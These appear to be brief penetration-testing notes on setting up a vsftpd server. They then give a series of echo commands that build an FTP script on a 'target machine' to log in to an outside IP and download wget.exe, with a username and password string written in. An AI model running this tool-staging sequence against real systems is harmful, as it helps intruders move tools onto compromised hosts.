FTP
vsftpd
Installing vsftpd
Update config to writable
locate write_enable=YES
and remove the #
in front of it and save the file changes.
Restart vsftpd
Now you can FTP and do what you need to do.
purging vsftpd
another way
Set up a ftp downloading script on the target machine
echo open IP 21 > ftp.txt
echo USER acknak>> ftp.txt
echo jLQRZy4gyLhmMqz2whTw>> ftp.txt
echo ftp >> ftp.txt
echo bin >> ftp.txt
echo GET wget.exe >> ftp.txt
echo bye >> ftp.txt